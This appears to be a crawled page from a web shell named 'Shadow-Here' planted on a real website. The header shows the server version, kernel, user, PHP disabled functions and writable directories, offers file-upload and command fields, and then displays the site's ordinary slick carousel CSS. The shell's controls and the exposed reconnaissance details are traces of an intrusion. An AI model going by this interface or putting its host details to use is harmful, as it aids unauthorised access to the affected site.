Shadow-Here


Server : Apache/2.4.41 (Ubuntu)
System : Linux cls 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User : iscuser ( 1001)
PHP Version : 7.4.12
Disable Function : shell_exec,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Directory :  /var/www/html/iscsoho/sahs.org.in/www/slick/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :
Current File : /var/www/html/iscsoho/sahs.org.in/www/slick/slick-theme-1.css
@charset 'UTF-8';
/* Slider */
.slick-loading .slick-list
{
    background: #fff url('./ajax-loader.gif') center center no-repeat;
}

/* Icons */
@font-face
{
    font-family: 'slick';
    font-weight: normal;
    font-style: normal;

    src: url('./fonts/slick.eot');
    src: url('./fonts/slick.eot?#iefix') format('embedded-opentype'), url('./fonts/slick.woff') format('woff'), url('./fonts/slick.ttf') format('truetype'), url('./fonts/slick.svg#slick') format('svg');
}
#news-car::after{
    content: '';
    display: block;
    width: 100%;
    height:35.6vh;
    background: #000b22;
    position: absolute;
    bottom: 0px;
    left: 0px;
    z-index: -1;
}
/* Arrows */
#news-car .slick-prev,
#news-car .slick-next
{
    font-size: 0;
    line-height: 0;
    position: absolute;
    top: 8%;
    display: block;
    width: 55px;
    height: 55px;
    padding: 0;
    -webkit-transform: translate(0, -50%);
    -ms-transform: translate(0, -50%);
    transform: translate(0, -50%);
    cursor: pointer;
    color: transparent;
    border: none;
    outline: none;
    /*background: transparent;*/
    background: #000b22;
    border-right: 1px solid #fff;
    
}

#news-car .slick-prev:hover,
#news-car .slick-prev:focus,
#news-car .slick-next:hover,
#news-car .slick-next:focus
{
    color: transparent;
    outline: none;
    /*background: transparent;
    background: #001033;*/
}
#news-car .slick-prev:hover:before,
#news-car .slick-prev:focus:before,
#news-car .slick-next:hover:before,
#news-car .slick-next:focus:before
{
    opacity: 1;
}
#news-car .slick-prev.slick-disabled:before,
#news-car .slick-next.slick-disabled:before
{
    opacity: .25;
}

.slick-prev:before,
.slick-next:before
{
    font-family: 'slick';
    font-size: 20px;
    line-height: 1;
    opacity: .75;
    color: white;
    -webkit-font-smoothing: antialiased;
    -moz-osx-font-smoothing: grayscale;
}

#news-car .slick-prev
{
    /*left: 25px;*/
    left:48.5%;
    z-index: 100;
}
[dir='rtl'] .slick-prev
{
    right: -25px;
    left: auto;    
}
#news-car .slick-prev:before
{
    /*content: '←';*/
    content: '<';
    font-weight: bold;
    font-family: cursive;

}
#news-car  [dir='rtl'] .slick-prev:before
{
    content: '>';
}

#news-car .slick-next
{
    right: 40%;
    background: #e5097f;
}
[dir='rtl'] .slick-next
{
    right: auto;
    left: -25px;
}
#news-car .slick-next:before
{
    content: '>';
    font-weight: bold;
    font-family: cursive;
}
[dir='rtl'] .slick-next:before
{
    content: '←';
}

/* Dots */
.slick-dotted.slick-slider
{
    margin-bottom: 0px;
}

.slick-dots
{
    position: absolute;
    bottom: -25px;
    display: block;
    width: 100%;
    padding: 0;
    margin: 0;
    list-style: none;
    text-align: center;
    width: 50%;    
    right: -130px;
    bottom: -67px;
}
.slick-dots li
{
    position: relative;
    display: inline-block;
    width: 20px;
    height: 20px;
    margin: 0 5px;
    padding: 0;
    cursor: pointer;
    background: #fff;
    border-radius: 10px;
}
.slick-dots li button
{
    font-size: 0;
    line-height: 0;

    display: block;

    width: 20px;
    height: 20px;
    padding: 5px;

    cursor: pointer;

    color: #e5097f;
    border: 0;
    outline: none;
    background: transparent;
}
.slick-dots li button:hover,
.slick-dots li button:focus
{
    outline: none;
}
.slick-dots li button:hover:before,
.slick-dots li button:focus:before
{
    opacity: 1;
}
.slick-dots li button:before
{
    font-family: 'slick';
    font-size: 6px;
    line-height: 20px;

    position: absolute;
    top: 0;
    left: 0;

    width: 20px;
    height: 20px;

    content: '•';
    text-align: center;

    opacity: .25;
    color: rgb(255, 255, 255);

    -webkit-font-smoothing: antialiased;
    -moz-osx-font-smoothing: grayscale;
}
.slick-dots li.slick-active button:before
{
    opacity: 1;
    color:#e5097f;
    outline: none;
    width: 20px;
    height: 20px;
    font-size: 6px;
    line-height: 20px;
    content: '•';
    -webkit-font-smoothing: antialiased;
    -moz-osx-font-smoothing: grayscale;
}

@media only screen and (max-width: 1366px) {
    #news-car .slick-prev {
        left: 48%;
    }
    #news-car .slick-next {
        right: 35%;
    }
    #news-car::after {
        height: 40vh;
    }
    .slick-dots{
        bottom: 24px;
    }

}

Samx